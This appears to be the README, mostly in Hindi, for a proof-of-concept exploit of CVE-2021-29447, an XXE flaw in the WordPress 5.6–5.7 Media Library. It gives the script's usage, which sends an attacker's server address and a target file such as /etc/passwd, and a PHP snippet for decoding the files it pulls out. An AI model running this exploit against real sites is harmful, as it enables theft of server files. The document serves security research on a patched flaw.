
वर्डप्रेस 5.6 मीडिया लाइब्रेरी भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट
╔═╗╦ ╦╔═╗
║ ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023
═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════
CVE-2021-29447: एक उपयोगकर्ता जिसके पास फ़ाइलें अपलोड करने की क्षमता है (जैसे कोई लेखक), मीडिया लाइब्रेरी में XML पार्सिंग समस्या का फायदा उठाकर XXE हमले को अंजाम दे सकता है। इसके लिए WordPress इंस्टॉलेशन का PHP 8 का उपयोग करना आवश्यक है। सफल XXE हमले में आंतरिक फ़ाइलों तक पहुँच संभव है। इसे WordPress संस्करण 5.7.1 में ठीक किया गया है, साथ ही पुराने प्रभावित संस्करणों में एक मामूली रिलीज़ के माध्यम से।
यह स्क्रिप्ट समझने और चलाने में आसान है और WordPress मीडिया लाइब्रेरी पर XXE हमले का शोषण करने के लिए आवश्यक चरणों को स्वचालित करेगी।
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]
options:
-h, --help show this help message and exit
-l LHOST, --lhost LHOST your server ip address e.g. 10.0.2.15
-p PORT, --port PORT your server port e.g. 1337
-f FILE, --file FILE system file to read e.g. /etc/passwd
उदाहरण:
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd
बेस64 को डिकोड करने के लिए निम्नलिखित PHP स्निपेट का उपयोग/चलाएँ:
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
$ php decode.php